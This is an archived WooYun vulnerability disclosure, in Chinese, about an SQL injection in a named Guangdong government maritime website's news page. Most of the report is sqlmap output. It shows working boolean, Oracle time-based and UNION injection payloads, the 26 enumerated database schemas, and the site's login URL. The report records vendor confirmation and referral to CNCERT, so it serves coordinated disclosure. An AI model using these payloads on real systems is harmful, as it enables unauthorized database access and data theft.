乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-24: 细节已通知厂商并且等待厂商处理中 2015-04-28: 厂商已经确认,细节仅向厂商公开 2015-05-08: 细节向核心白帽子及相关领域专家公开 2015-05-18: 细节向普通白帽子公开 2015-05-28: 细节向实习白帽子公开 2015-06-12: 细节向公众公开
RT..
url:http://www.gdhydro.com/
SQL注入:
http://www.gdhydro.com/MaritimeManage/portal/news/news_info.jsp?newsId=2149
[12:07:51] [INFO] testing 'Oracle AND time-based blind'[12:08:22] [INFO] GET parameter 'newsId' seems to be 'Oracle AND time-based blind' injectableit looks like the back-end DBMS is 'Oracle'. Do you want to skip test payloads specific for other DBMSes? [Y/n] yfor the remaining tests, do you want to include all tests for 'Oracle' extending provided level (1) and risk (1) values? [Y/n] y[12:08:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'[12:08:27] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found[12:08:27] [INFO] ORDER BY technique seems to be usable. This should reduce thetime needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test[12:08:30] [INFO] target URL appears to have 11 columns in query[12:08:31] [INFO] GET parameter 'newsId' is 'Generic UNION query (NULL) - 1 to 20 columns' injectableGET parameter 'newsId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] ysqlmap identified the following injection points with a total of 44 HTTP(s) requests:---Parameter: newsId (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: newsId=2149 AND 3997=3997 Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: newsId=2149 AND 8821=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(117)||CHR(120)||CHR(97),5) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: newsId=2149 UNION ALL SELECT NULL,CHR(113)||CHR(98)||CHR(106)||CHR(106)||CHR(113)||CHR(88)||CHR(72)||CHR(117)||CHR(118)||CHR(106)||CHR(83)||CHR(104)||CHR(66)||CHR(78)||CHR(108)||CHR(113)||CHR(118)||CHR(106)||CHR(112)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-----[12:08:34] [INFO] the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oracle[12:08:34] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes[12:08:34] [INFO] fetching database (schema) names[12:08:34] [INFO] the SQL query used returns 26 entries[12:08:35] [INFO] retrieved: CTXSYS[12:08:36] [INFO] retrieved: DBSNMP[12:08:36] [INFO] retrieved: DMSYS[12:08:37] [INFO] retrieved: EXFSYS[12:08:38] [INFO] retrieved: GDHPD[12:08:38] [INFO] retrieved: GDHPDWEB[12:08:39] [INFO] retrieved: HR[12:08:40] [INFO] retrieved: IX[12:08:40] [INFO] retrieved: MARITIME[12:08:41] [INFO] retrieved: MDSYS[12:08:42] [INFO] retrieved: NTM[12:08:42] [INFO] retrieved: NTM_EN[12:08:43] [INFO] retrieved: OE[12:08:43] [INFO] retrieved: OLAPSYS[12:08:44] [INFO] retrieved: ORDSYS[12:08:45] [INFO] retrieved: OUTLN[12:08:45] [INFO] retrieved: PM[12:08:46] [INFO] retrieved: SCGRID[12:08:47] [INFO] retrieved: SCOTT[12:08:47] [INFO] retrieved: SH[12:08:49] [INFO] retrieved: SYS[12:08:50] [INFO] retrieved: SYSMAN[12:08:50] [INFO] retrieved: SYSTEM[12:08:51] [INFO] retrieved: TSMSYS[12:08:52] [INFO] retrieved: WMSYS[12:08:53] [INFO] retrieved: XDBavailable databases [26]:[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] GDHPD[*] GDHPDWEB[*] HR[*] IX[*] MARITIME[*] MDSYS[*] NTM[*] NTM_EN[*] OE[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] PM[*] SCGRID[*] SCOTT[*] SH[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB
登录地址:
http://www.gdhydro.com/login.html
available databases [26]:[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] GDHPD[*] GDHPDWEB[*] HR[*] IX[*] MARITIME[*] MDSYS[*] NTM[*] NTM_EN[*] OE[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] PM[*] SCGRID[*] SCOTT[*] SH[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB
过滤
危害等级:高
漏洞Rank:10
确认时间:2015-04-28 10:24
已经转由CNCERT下发给相应分中心,由其后续协调网站管理单位处置。
暂无